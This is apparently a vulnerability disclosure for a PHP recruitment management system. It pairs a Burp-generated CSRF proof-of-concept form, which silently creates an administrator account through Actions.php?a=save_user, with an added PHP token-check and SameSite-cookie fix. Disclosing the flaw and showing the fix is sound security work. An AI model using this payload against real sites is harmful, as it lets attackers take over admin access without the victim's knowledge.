
# Exploit Title: Company's Recruitment Management System 1.0 - 'Add New user' Cross-Site Request Forgery (CSRF)
# Date: 18-10-2021
# Exploit Author: Aniket Anil Deshmane
# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
# Version: 1
# Tested on: Windows 10, XAMPP

Detail:

The application does not use any security token to protect against CSRF, so a malicious user can create a new administrator account by means of a crafted POST request.

CSRF POC:-

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <!-- No anti-CSRF token is sent with the request -->
    <form action="http://127.0.0.1/employment_application/Actions.php?a=save_user" method="POST">
      <input type="hidden" name="id" value="" />
      <input type="hidden" name="fullname" value="Test" />
      <input type="hidden" name="username" value="Test" />
      <input type="hidden" name="type" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
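As an added example that is not part of the original PoC or the vendor's code, the following shows how Actions.php could protect the save_user action with a per-session synchronizer token; the field name csrf_token, the helper function names and the SameSite=Lax cookie setting are assumptions.

```php
<?php
// Added example, not part of the original PoC or the vendor's code: a
// synchronizer-token check for the save_user action. The field name
// csrf_token and the helper names are assumptions.

// Mark the session cookie SameSite=Lax so a cross-site top-level POST such as
// the PoC form is sent without it; Secure and HttpOnly are defence in depth.
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Lax',
]);
session_start();

// One unpredictable token per session, embedded in the "Add New user" form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_field(): string {
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Reject a state-changing request whose token is missing, malformed or wrong.
// hash_equals() compares in constant time; is_string() guards against
// csrf_token[] array input, which would otherwise raise a TypeError.
function require_csrf_token(): void {
    $sent = $_POST['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    if ($expected === '' || !is_string($sent) || !hash_equals($expected, $sent)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
}

// In Actions.php, before the existing save_user handling:
if (($_GET['a'] ?? '') === 'save_user') {
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        http_response_code(405);
        exit;
    }
    require_csrf_token();
    // Existing save_user logic (id, fullname, username, type) runs only from
    // here, and should still confirm the caller's session is an administrator.
}
```

The PoC form above sends no csrf_token, so require_csrf_token() answers 403 before save_user runs; with SameSite=Lax the session cookie would not even accompany that cross-site POST.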